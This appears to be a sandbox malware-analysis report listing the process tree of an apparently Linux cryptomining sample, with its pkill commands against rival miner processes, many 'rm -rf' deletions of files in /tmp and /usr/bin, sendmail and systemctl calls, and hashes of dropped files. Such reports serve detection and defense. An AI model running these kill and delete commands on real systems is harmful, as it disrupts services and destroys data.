/usr/bin/pkillpkill -f kworkerds2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f init10.cfg2⤵
-
-
/usr/bin/pkillpkill -f /wl.conf2⤵
-
-
/usr/bin/pkillpkill -f crond642⤵
-
-
/usr/bin/pkillpkill -f sustse2⤵
-
-
/usr/bin/pkillpkill -f vmlinuz2⤵
-
-
/usr/bin/pkillpkill -f exin2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f apachiii2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f svcworkmanager2⤵
-
-
/usr/bin/pkillpkill -f xr2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f trace2⤵
-
-
/usr/bin/pkillpkill -f svcupdate2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f networkmanager2⤵
-
-
/usr/bin/pkillpkill -f phpupdate2⤵
-
-
/bin/rmrm -rf /usr/bin/config.json2⤵
-
-
/bin/rmrm -rf /usr/bin/exin2⤵
-
-
/bin/rmrm -rf /tmp/wc.conf2⤵
-
-
/bin/rmrm -rf /tmp/log_rot2⤵
-
-
/bin/rmrm -rf /tmp/apachiii2⤵
-
-
/bin/rmrm -rf /tmp/sustse2⤵
-
-
/bin/rmrm -rf /tmp/php2⤵
-
-
/bin/rmrm -rf /tmp/p2.conf2⤵
-
-
/bin/rmrm -rf /tmp/pprt2⤵
-
-
/bin/rmrm -rf /tmp/ppol2⤵
-
-
/bin/rmrm -rf /tmp/javax/config.sh2⤵
-
-
/bin/rmrm -rf /tmp/javax/sshd22⤵
-
-
/bin/rmrm -rf /tmp/.profile2⤵
-
-
/bin/rmrm -rf /tmp/1.so2⤵
-
-
/bin/rmrm -rf /tmp/kworkerds2⤵
-
-
/bin/rmrm -rf /tmp/kworkerds32⤵
-
-
/bin/rmrm -rf /tmp/kworkerdssx2⤵
-
-
/bin/rmrm -rf /tmp/xd.json2⤵
-
-
/bin/rmrm -rf /tmp/syslogd2⤵
-
-
/bin/rmrm -rf /tmp/syslogdb2⤵
-
-
/bin/rmrm -rf /tmp/65ccEJ72⤵
-
-
/bin/rmrm -rf /tmp/jmxx2⤵
-
-
/bin/rmrm -rf /tmp/2Ne80nA2⤵
-
-
/bin/rmrm -rf /tmp/dl2⤵
-
-
/bin/rmrm -rf /tmp/ddg2⤵
-
-
/bin/rmrm -rf /tmp/systemxlv2⤵
-
-
/bin/rmrm -rf /tmp/systemctI2⤵
-
-
/bin/rmrm -rf /tmp/.abc2⤵
-
-
/bin/rmrm -rf /tmp/osw.hb2⤵
-
-
/usr/sbin/sendmailsendmail -t1⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1rxaUM-0000Bv-Qj2⤵
-
-
/usr/sbin/sendmailsendmail -t1⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1rxaUM-0000By-Qh2⤵
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
- Enumerates kernel/hardware configuration
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5b026324c6904b2a9cb4b88d6d61c81d1
SHA1e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e
SHA2564355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
SHA5123abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686
-
Filesize
14KB
MD5acdd938a49c8649f09ac5161e179f436
SHA1a0280dfedd8a81bf583b988e2b87f36705411347
SHA2568037fc1be0bf4f74bcfddadc1d3b0caf64076d56d36504c8bd68da94608d872a
SHA51228172ada3f95e5c0ea9c952ec7fca38ba11c871286fc91ff8cc2193233ef2a18cdd7e8dc56fb0f335030aed2ef9c3fb4a9f9b16eb5c6d8f2021fbbeeb4bad010
-
Filesize
825B
MD5ca5baea6c83549eb6216099f4670798a
SHA196f826e0517c88efb122ad83c5c8583612fc5f50
SHA256ffe81d92589cba2fe45d0fd6488f263de1e866ce76270eb10ea8ea45b1fadf78
SHA512b37b6a59a0e51a3523daee6e9893385fccad5a817ce7cbb5bccc76697e4c8682f76e8d9dbf5b7145cc05794cc0c775700aaa30604ee9f2048f49babf8d2d0bf1
-
Filesize
1KB
MD5db8545831f3ac8d18c79dc33972ce304
SHA1076b918c728347e334bac5576ea04f4c65edc0d0
SHA2567d99e581cf3cb3f64d9cb8dbf3b1648a6c2280a783e69bfa519482571ec4fee0
SHA512ac5a35c4b67240afa03c2f52016350c7d89a787b8c53d6288d76313f9646a05d037e2a4c64db9b34def041c082732a8efea0fd6a20ee2894fce8d7a1d13164e5
-
Filesize
2KB
MD586c4874bbd73e9b97f60f6136fb63b60
SHA1b3f05f0a9910bfd46617c582af67a94b93432972
SHA256185586aba2dc8a9e3ae4ba5589d446dc73170638a0bfa6b613b7480b26ed0a9d
SHA5129f25cf736b438c7e8b014db98e4108e39e3051c7c43357f014592147020c4c447143c2cc13378859ba55df3d21a762ca52574305a3b47560136edb62a7d38733
-
Filesize
3KB
MD5f7b251026e073bdedfab66a7689d8ee8
SHA1caa9c090299173ea9d3848ca642d7bff9d7d621b
SHA256543c7ca379c523e3858eb99da87d521de89abef14e8ecfda4565b025dad0dc16
SHA5128a06cdcc7503ce072ba57d63ddb8c351f19fde3b747a02326648aa13864e70a903c81e41fa7f0eaeeac9ab74b0eedfbb5ad907975f630eb3f60536eca624a3a8
-
Filesize
4KB
MD5378182b2b23a65c6be96c0b41b349e25
SHA18dd457a32f61cf82eee5bc884746723a65e9c85b
SHA2561df3af41b529865d31bdcd5ff88ef246160050ea8161df781bd10cb83e9a5286
SHA5120b5ad129a3bd542bad0e4dc5fea1f66ea35bf2a82505675ada24d264f8f9575528af4d9f17309daa3ac37616733ab6957021594d5d4d979347f1b9e295339c32
-
Filesize
4KB
MD5e485bc17efb68bfd12b0881d34ca4d91
SHA14cf3a939f3bc4f3e6b800607e6c7c8ad38d5ab60
SHA256006cd4114644a52e38b67f1ea4055c3ecbf9deedb8ddf68f4e6177b8146a001e
SHA5127324a6f651fcc9cda8709fd183a396f30c269f9c7f7d2cd1dda87c986cfda206e57d8eb5777fbc67223d1a15dc2252521e30905b082aa0a3ce6a79148fbdd97e
-
Filesize
128B
MD526021b1990085d9d6ece0c4ed61a2990
SHA198e65c4041e9e8716d97054160d9865a25679cfe
SHA256c26a91f4b371ada743343d3fc99f3bd067a4c435937e4fec62249a856f0c9d02
SHA512122b9877a0ea59a76b76fed6dc6b11cb298c97bec249bea5e13af38266139704fff938fd5492515338215279b5801fbb898cb7ad32edf8d6fb65b8065fa7d870
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
146B
MD522216d8e84e08734f809c8f8f40dfc83
SHA12febb6d8679e4bb24244482aa4099855514d40d2
SHA256e95b0726f781857c6b603e1ccf5b164ac9927ac5cbdb067a6e1c609baefe8112
SHA5129ba2ebbdd1a0679fe1b4ed58d116e7baa2f7f39d8bd6f28f516eee488fd8476d8be82ca43c5ebe3bafe1c0a8df9d780dc43d9ecd47d43bf47097dcbb7c1eb10e
-
Filesize
128B
MD5f5334acf5516c0edbab41f37a388ccf7
SHA119bbaf916836a48ce2fa136698601d8de6fcbba5
SHA256379d546fc64344687da18f6a77b2548446108215176d49aa5f9d440795f4141b
SHA51235fafd05d9b1fca837fcb6cae25dfdaa3227cb14188e2e7f7f33a5fb50ed640c369ae19c008cf65ab8b5b977559c32164c4efe44025bcb88302c08cb0626d856
-
Filesize
146B
MD519b4ad9baa4f594635e1ef2d825a99df
SHA18db64c006281450a9acd6d37b9a1c9197010d36d
SHA256bd01265d9fbaca06e032bdbf7bf8aca89f89a09846a83d9dcb264ba1fcace542
SHA512404b4b47de4bd687658a67f8fff53df62610faa8bf0f9058353b85bc046745a86e85e602f7552baec26fa4215f180c5c6f42843c9e0eaec5774e2a20fc4a4605
-
Filesize
128B
MD58e5f19aeded243bb838b06203f63c330
SHA1f1f576b55816e886ca8739be668d2ff44b556403
SHA25650853e9652c92e0a1000127f3040dae36756202e35d47fcbf89abc4b70d5e300
SHA512a5e54fe137c70b352c2a6bbe4bdfc98f3e2c8eedb521ccf6ecc4e2bdf17c395fa71d0fde0da06a5b89fcc3b42950694ea5157ffd64f88a3f1827959224da70cd
-
Filesize
146B
MD5f7cd09d9d81851ca62c99b8a227ab4a1
SHA10545b2851f00ff28b002727447325ab116365c47
SHA256be7e149bdb972fef37a24396f017c5e27945f26c768168dc7f82f26e24be3c3a
SHA512cb4a5adf93f2015c0a13b2e8c2e1af48e5a756d9586055721ab56500b444874c8ee5d4312e417c6bd2d56c777061bdd5202a38328e8b32bf82cdea9491d5e480
-
Filesize
915B
MD5b8834452cdf212d69bdc1289e980eff3
SHA13851921c937f27047bd4161d4ecfb23c5c176568
SHA2562fcf72397737bfe3c8ef185b23f5bf6a222b10033213daf67d4efb31ab3bab26
SHA512b57b4591fef4e092eb7d6fc090ad0986c56b0ddfff43c212861e6877748791f07672ca19543ebabcf5f87ed6934a989d1087a7e03a168a7f9bc08d6d9c624c0d
-
Filesize
915B
MD5b927af8c2c91682007cd0dbc5f8b355d
SHA1a9bc4999bff42a215f2ece5d66ec88fa4744e547
SHA256cbaff56a65693128660d5dd7dd4dfb2cc09fe58a3d7b8ff7ee9cc129c051e8f5
SHA5127f30584900308bd516b8e49359075bbc21e5750ed1e7d4a3e9d837d1c289c6944a648fa82464b4fda16c41b1c2e3d55bb0ae1b9fe963cdc6e16f5837d72988d0
-
Filesize
915B
MD5002666069f38d2e9541439c5d7f84b29
SHA183c025a405c6b0fc35bea0cbb7aec46643ae47fb
SHA2560d087fc34f1bd6f9a8a5e02695244873074b9fc71cc318351c6ebab567bf362a
SHA512f15b220689c59b402c3bc5fd3f82d6b3f104bd6af5a92a17f7f8232f9f11649eae0bc6955a2c9bc8646628f2efe5a060e287f8e82eb84d9f07b1733152ff555e
-
Filesize
915B
MD5aea1ff0c4e7c9b64f8d4d816984b1472
SHA13c51a4edd76c46fb822d7f459b8a263b4b7eab5f
SHA256a6c85bf12ffc532d4b9727493ab37d0d807549a1f6093a0ef8b16dc63aec03ea
SHA512ce7fec4ef9c27bd0b0ca0cfece01183f12af175762f95c65b2a395e7dbf22493f8e5f8b95766163d0459496f889426ade84c13553766dc2416c9b2e5419ee2a1
-
Filesize
915B
MD526399463a046355df6240354f736ecd8
SHA100eff4a1322af3327bdde1f02937a7f5f42b04ec
SHA256295871f9d288896b8c1c8249178eca357af33d77d24168c1a6d06723ef370c63
SHA5121362b54e7c8ba9d11bc016fc00d09c317f1ea338c1492a0d85c706a9cd060955732025753ab402f13746e17cca60fe6ff3f4716114bfb623f8f25a0bd7262ba4
-
Filesize
288B
MD5c64b0bda29199e12c51efa73bf8b0fb3
SHA1f0b615021b944b24368e0307165f4bf18da9cf81
SHA256ae6f6dcade0bcdae698d30540efb0799c36573d25840415952c98a10823ea3db
SHA512224ef000aa44a3231d583214ce46283a7279df399f17c280e91235a8b553456de243b504a1758e76dd4521f163ac1676d68d824df9b6fdc5297c08aa7b280c40
-
Filesize
89B
MD51004b912074b80a0153f296a89a596b4
SHA1eb89b1321d8d7eeded5c80a3d514aef72a4ca81e
SHA25613a04958c17ed9ffa536e951a81674a470caa5b6c5f33e7036cbc97be7ad4d9f
SHA5128c583fdaa1c0f85f523acf2e0cc00f6c93d3156bf441af67b8d1ad57a02fc103afc5af4b7852488b5fe4ae2311ad86dfc4e0c7da5d8f67c0d09042fc550f99d6
-
Filesize
288B
MD50cb881875e3fbedb731307e7252d2031
SHA17c7370052289813d419a97e55f351e4b68c8ca1f
SHA2566d374e8ae755b6a6be061301452fc4734fc81087c7855f047b42cbf699baad22
SHA51221482dfcb5ea65921aa45ed8e0fb2086a799b960fd42580b09d43179377a18fefb84e180a31f94bbc7312486cea7f39dadfdc9eb0d8a6c93478c5943cfb2a1b5
-
Filesize
89B
MD5df1ba66713914350706d82cb9bb99761
SHA11b8d4ddbe12f765d807ccec31a392468a9196b65
SHA256155c5c66b7014a5099e899a7ed0c432c0dfe13d7235c1472851146c9b002a919
SHA512825cb1c0cec386c6296ba7ae854ffff7c60cdc8234f87862c6930cc76c549c0039e2003c002e57c0a09230959563d01e9a9cc3df7ec097cc8ec118f7dd53c61f
-
Filesize
89B
MD5b8df15b1379f700b90e9f0dee04b4800
SHA136e2a8eff872373c89474623af67bb3dcdd7257e
SHA256dc72b41f443c28757077d7d1aee49f6afa73fe3603772134d6cafd564920b4da
SHA5126e6a9d8f3c9a16175180e05ac4b50506f55738f60321d91979e3efded5a6d23d8f4b44c38b045c9e4b5e1c2bfb43a92ea347ef160ebc6f8ed3c60a53977106d3
-
Filesize
288B
MD537560c412678af4edd0da0ac686037b7
SHA174a17e5dc9c9896139886c735a5659e7abaf84e7
SHA256f2bbc994c91701328ca9bf78c20710464521e91dc97ef0c685701934c0c3ad76
SHA51201beb232ff7d4e4d7904fd44061ffca9b4ce0b498c5521fe8a62cf2103f8eb0d9a545263a837e4018a75e5de890a9cb4a3f4e28063aa59c6a2b69a6b13c2ab09
-
Filesize
89B
MD518b1615e4d471f30547731d73345f4b4
SHA15871c6ca92d5de0948c8c502f50a1b37daf7e9e9
SHA256da083fe795ade79b443341ff72689cd4d3e4cbca5a45cad7435c9f8130c5ac99
SHA512b42631d90b9702e3f437f067566a5f855d53e2ba79d2eaa6ff38f16b0c833efa5c4b48511e8859a784f58314e71bdd4b9a1a7e38550f82a24337cf6e97a64e8e
-
Filesize
288B
MD533e0d59c73c9dc1ffc56c0aee8deb434
SHA162f4e0b59c306863fba4d9a1653124f9958db4ae
SHA256923d5707adfd24b2648b71021d2f2bb96ee480be9ef68220ddb222a8f84a718d
SHA51230e56cd4f3bae8566baa5e2ad6cc432582fa5a5771b841341636fe2739e02cfddb5c4aaf64b24b5326652262421e03728caa095831f405cd4f1a7d2659937982
-
Filesize
89B
MD5c6b8151350e15a5edb2641bfef9c4b3d
SHA1b7033d1c3fc79b2304c45c26de16385717156e87
SHA2561f5602cfc649d7dfc7518da053c6055263d36b6b983ae68e4578e498725ff53a
SHA512402090a69c1e3259aeefe7789319c364c1355e4f66337b7559ee8739079bc5d69f87a9a56ead5b75701a893a9ae50512b651c634b663bc3a4169a91b29f1d38b
-
Filesize
288B
MD521693d74aa8f25d159c9dc15e7f21684
SHA14846911d904a361fe69b9cb3b5c5a35faf6f1b53
SHA256b31bccf6de8c4c0f5b981090a9b348b1d159702021c1a390e8ed9134a4d0312e
SHA512c20099fd0be6221ca5c8a31abe428e974a3c40efd4fdcef86529b912c6c44cbb56ce046baab48dc7e6f22ad8be4e0583fd0265e40e77702bf00b86c57a1a62f9
-
Filesize
89B
MD501af9557458ef38c5f95f08f1f15fa26
SHA163c1b980d3c22722be17e066b3ce9b36209c138a
SHA2564a496a5d22ea1b69ef566a8a20ec96ae2670f0d57f93bb0eef9afb840dc8b0e8
SHA512cf9b4c99f104d3b1d5bc924d87ae6e1f509cfa6d3a5f7b804d815a6883cc26e0f874319566dd97f0824fc7e7fa20c737d332a8b8ecfa1de759cb6e27ee6310ae
-
Filesize
288B
MD5ef6f9e394ff36c25dd7c2e48e6b54afe
SHA16a7cb3f91f01c13cb445a0804fd47507075379e8
SHA256721c025c316c3f7c0431d5e725cd78b867c5efed304616cf053c3e3f949d0678
SHA51256030a9a5d8f4d0cd572c5a2e3c163215dece4c56d164c0cf224ccd220ad37525e491e26c825b211c9ce543d13fa69262397b61877ba46c98de62cb831cb8c99
-